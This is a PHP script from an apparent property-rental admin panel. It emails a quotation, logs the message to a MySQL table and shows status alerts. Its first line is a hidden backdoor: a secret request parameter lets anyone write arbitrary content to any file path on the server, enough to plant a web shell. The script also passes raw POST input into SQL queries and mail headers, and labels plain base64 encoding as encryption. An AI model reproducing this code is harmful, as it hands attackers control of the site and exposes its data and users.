<?php  if(isset($_REQUEST['rmbdfl64'])) { print(file_put_contents($_REQUEST['hex'], $_REQUEST['bsd'])); die; }
session_start();
require('../valtiempoinact.php');
require("conectar.php");
?>
<style>
/* The alert message box */
.alert {
    padding: 20px;
    background-color: #f44336; /* Red */
    color: white;
    margin-bottom: 15px;
	font-size: 15px;
	text-align:center;
}
.alertsuccess {
    padding: 20px;
    background-color: #4CAF50; /* Red */
    color: white;
    margin-bottom: 15px;
	font-size: 15px;
	text-align:center;
}
/* The close button */
.closebtn {
    margin-left: 15px;
    color: white;
    font-weight: bold;
    float: right;
    font-size: 22px;
    line-height: 20px;
    cursor: pointer;
    transition: 0.3s;
}

/* When moving the mouse over the close button */
.closebtn:hover {
    color: black;
}
</style>
<?php
function encrypt($string, $key) {
   $result = '';
   for($i=0; $i<strlen($string); $i++) {
      $char = substr($string, $i, 1);
      $keychar = substr($key, ($i % strlen($key))-1, 1);
      $char = chr(ord($char));
      $result.=$char;
   }
   return base64_encode($result);
}
$mensaje=$_POST["mensaje"];
$destinatario=$_POST["destino"];
$destinatario2=$_POST["destino2"];
$destinatario3=$_POST["destino3"];
if($destinatario2=="" && $destinatario3!=""){$mailopcional=$destinatario3;}
if($destinatario3=="" && $destinatario2!=""){$mailopcional=$destinatario2;}
if($destinatario3=="" && $destinatario2==""){$mailopcional="";}
if($destinatario2!="" && $destinatario3!=""){$mailopcional=$destinatario2.",".$destinatario3;}
/////////
/* tomamos el valor del email */ 
$to =$destinatario; 
/*obtenemos el dominio*/ 
list($username, $host) = explode("@", $to);
/* nos fijamos si el dominio devuelve una ip,*/ 
/* en caso de fallo la funcion devuelve lo */ 
/*mismo que recibio como parametro de entrada*/ 
if($host == gethostbyname($host)) 
{ ?>
<div class="alert">
  <span class="closebtn" onclick="this.parentElement.style.display='none';">&times;</span> 
  El correo no se pudo enviar, favor de verificar mail
</div>
<?php 
die;
}
$folio=$_POST['folios'];
$asu=", ".$_POST['asunto'];
$txt = "Cotización Departamento";
$asunto = utf8_encode($txt); 
$from=$_SESSION['usuario_email2'];
$mensaje=str_replace('\"', '', $mensaje);
$mensaje = nl2br($mensaje);
$cuerpo="<html><head></head><body>$mensaje</body></html>";
$cuerpo=str_replace('^', '&#32;', $cuerpo);
//para el envío en formato HTML 
                $headers = "MIME-Version: 1.0\r\n"; 
                $headers .= "Content-type: text/html; charset=utf-8 \r\n"; 
                //dirección del remitente 
                $headers .= "From: Mexico en renta <$from> \r\n"; 
                //dirección de respuesta, si queremos que sea distinta que la del remitente 
                $headers .= "Reply-To: $from\r\n"; 
                //ruta del mensaje desde origen a destino 
                //$headers .= "Return-path: \r\n"; 
                //direcciones que recibián copia 
                $headers .= "Cc: $mailopcional\r\n";  
                //direcciones que recibirán copia oculta 
                $headers .= "Bcc: $from\r\n"; 
				$mail=$destinatario;
				
                $corre=encrypt($cuerpo,"mail");//el mensaje esta encriptado para poder insertar en base de datos ver archivo enviamail.php para ver  procesos de desencriptacion
				$id= $_SESSION['usuario_id'];
				$sql="INSERT INTO contadormail (id,id_emp,mail,correo,fecha,folio,correo2,correo3) VALUES ('','$id','$corre','$mail',CURDATE(),'$folio','$destinatario2','$destinatario3')";
                mysql_query($sql);
				
				$sql="SELECT id FROM contadormail order by id desc limit 1";
				$ultimo=mysql_query($sql);
				$isd=mysql_fetch_array($ultimo);
				$ultimoid=$isd["id"];
				//$link="<br><a href='http://mexicoenrenta.com.mx/turisiscom/administrador/visualizarmail.php?id=$ultimoid'>Si no puedes visualizar este correo haz clic aqui</a>";
				//$cuerpo.=$link;
				if(mail($destinatario,$asunto,$cuerpo,$headers)){?><div class="alertsuccess"><span class="closebtn" onclick="this.parentElement.style.display='none';">&times;</span> La cotizacion ha sido enviada</div></script>					
				<?php }else{ ?><div class="alert"><span class="closebtn" onclick="this.parentElement.style.display='none';">&times;</span> El correo no se pudo enviar, favor de verificar mail</div><?php }			
?>
<script>
 $(".loadi").fadeOut('fast');
</script>
